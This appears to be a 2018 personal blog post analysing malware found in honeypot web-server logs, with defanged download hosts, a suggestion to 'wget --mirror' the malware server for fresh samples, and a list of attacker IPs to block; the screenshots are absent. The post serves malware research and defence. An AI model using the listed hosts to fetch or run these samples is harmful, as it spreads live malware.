sobota, 21 lipca 2018

Reading malware - your sister

In the meantime I decided to check again if there is something 'new' in logs from one of the honeypots I decided to run some time ago. Below you will find few details from the journey...

When I was reading logs from my WWW server I found that there is some 'old and known' string - but with the 'new' (attackers) IP(s):

One more screen with IP(s):


As you can see there are few IPs but they are asking 2 hosts for the file. So we have now:

-- hxxp://g;mariokartayy;com
-- hxxp://104;244;72;82

Next step I tried (after I downloaded the file from log-request) was to read it ;)


So we found a sister everybody! ;D

I decided to 'beautify' the code a little bit:


Now it's better ;]

Checking:


Some more results from strings tool:


At this stage I decided to google a little bit. I used the string from the malware request (xml part with <NewStatusUrl code) and that's how I found some weird pastebin link:


According to the date the script is still 'fresh':





Reading the source you will find the line mentioned before:


I don't know why it's still at pastebin... Anyway, looking for other source codes available there you will find more weird tools, for example:

Well...

I would like to add one thing here: do not use those tools. It will probably be illegal.
Do only legal things.

At this stage I decided to get back to my shell and prepare small bash script to automate a bit the process of 'checking logs' and dropping 'bad-guys' ;)

For now we will have to ban on firewall(s) our winners:

[+]  156.196.247.242
242.247.196.156.in-addr.arpa domain name pointer host-156.196.242.247-static.tedata.net.
Country:        MU
country:        EG
--
[+]  156.199.87.116
116.87.199.156.in-addr.arpa domain name pointer host-156.199.116.87-static.tedata.net.
Country:        MU
country:        EG
--
[+]  156.201.76.26
26.76.201.156.in-addr.arpa domain name pointer host-156.201.26.76-static.tedata.net.
Country:        MU
country:        EG
--
[+]  156.220.219.222
222.219.220.156.in-addr.arpa domain name pointer host-156.220.222.219-static.tedata.net.
Country:        MU
country:        EG
--
[+]  197.33.174.107
107.174.33.197.in-addr.arpa domain name pointer host-197.33.174.107.tedata.net.
country:        EG
--
[+]  41.47.40.149
149.40.47.41.in-addr.arpa domain name pointer host-41.47.40.149.tedata.net.
country:        EG
--
[+]  92.4.84.196
196.84.4.92.in-addr.arpa domain name pointer host-92-4-84-196.as43234.net.
country:        GB

Last view from the Ida, checking strings again:


Following selected line should get you here:


Cool, as we can see, code is prepared to check 3 variants to run another downloads...

(In the time of creating this post other binaries - like yeet - were not available for download, but if you would like to get a fresh sample, use wget --mirror. Maybe you will find something interesting to check;))

I tried to read few found samples (Ida) but the best to check in my opinion is arm7.gemini:

 

As this sample (case) is already described online I will leave it for you to play with it and do some research for yourself.

Good resources (I found during the analysis) you can find here:
- thanks to SeeBug
- thanks to Fortinet
- thanks to CheckPoint
 
See you next time ;)

Cheers
o/


Brak komentarzy:

Prześlij komentarz